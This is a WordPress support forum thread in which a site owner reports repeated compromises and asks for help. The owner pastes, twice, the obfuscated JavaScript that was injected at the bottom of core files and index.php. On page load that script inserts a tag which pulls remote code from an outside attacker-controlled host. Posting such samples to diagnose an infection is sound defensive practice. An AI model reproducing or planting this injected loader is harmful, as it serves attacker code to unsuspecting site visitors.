Support » Fixing WordPress » <script> appearing in core files and disabling WordPress

  • The last two days, a site I host has been compromised twice by the same <script> popping up in core WordPress files. This happened on 2.8.6 and 2.9. Not faulting WordPress here — there’s something else at work that is allowing access for this code to be placed onto the site.

    At any rate, yesterday the code in question appeared in wp-includes/default-widgets.php and just now it appeared in wp-includes/default-filters.php at the very bottom of each file.

    <script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

    I’m wondering if this is a plugin that is compromising the site security (other blogs on my account have not been compromised) or if it’s a theme file or what? I’ve changed the FTP access codes n case that was the site of the compromise…

Viewing 3 replies - 1 through 3 (of 3 total)
  • esmi

    (@esmi)

    Forum Moderator

    Yeah, I never really “Cleaned up” — just removed the bad files. Also found a theme no longer posted RSS and that had to be changed. I’ll follow the steps in those links. Thanks emsi.

    I’m in the middle of following some steps from the above links and wanted to post what I found:

    Script code added to the index.php file itself

    <script>/*GNU GPL*/ try{window.onload = function(){var Z053al9rqw = document.createElement('s#$c@#()$r)&^(i@@()p$#!t!#('.replace(/\!|\$|@|\(|\^|&|\)|#/ig, ''));Z053al9rqw.setAttribute('type', 'text/javascript');Z053al9rqw.setAttribute('src', 'h$t&t@!$#p$#:(!/@@/(&)t!$i(m(!!^e#($-(#c@$o)!^m$&#.!!s$#)u)$@r#^v!@(e(&y)(&&m@@o((n!^k#&)^#e&y(#$.$!c!$o&($m@!#.)$w^$^a&s#$(h^i!#n$!^g))t@)o^n^p^^o^@#$s&^t@@-^!c(^&o&m!^!^$.#w!@i&$&$@n$)$t#&#!e))&r$$#s(&a!$(l@e!@(o)^$#n^$)l)(&)i@&n!!@#e#!.$@#r^)!u&#^:@$8@!0)$#8@^!0!!!/^^))g!($o)^&o&g@#)&l^&&)e().^$&c#)@$!o!@)m$$/$!!!#g$o)@(o@g)#l@#^)@e$!#.#^@#c(@o^m!#/#$&z(@e@!!(d((o##(.!c@^!o)!)m)/^!m#)!@e&d&#i^(@a@(p$l^^e#x($.#!#c^&&!o@#^m^^/$^)g&&!o(^&o^g@!l^@@e@#.$c(o!.@^t(^h^!/&&'.replace(/\^|\!|\)|#|\(|&|\$|@/ig, ''));Z053al9rqw.setAttribute('defer', 'defer');Z053al9rqw.setAttribute('id', 'M@^g(7)m$&5#l#s@$(!#o#@^k#!$q)$)'.replace(/&|@|\!|\$|#|\^|\)|\(/ig, ''));document.body.appendChild(Z053al9rqw);}} catch(e) {}</script>

    Wp-content/index.php also has a script inserted. I just backe dup teh sties and the DB and will be doing an ultra-clean install (deleting everything on the server).

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘<script> appearing in core files and disabling WordPress’ is closed to new replies.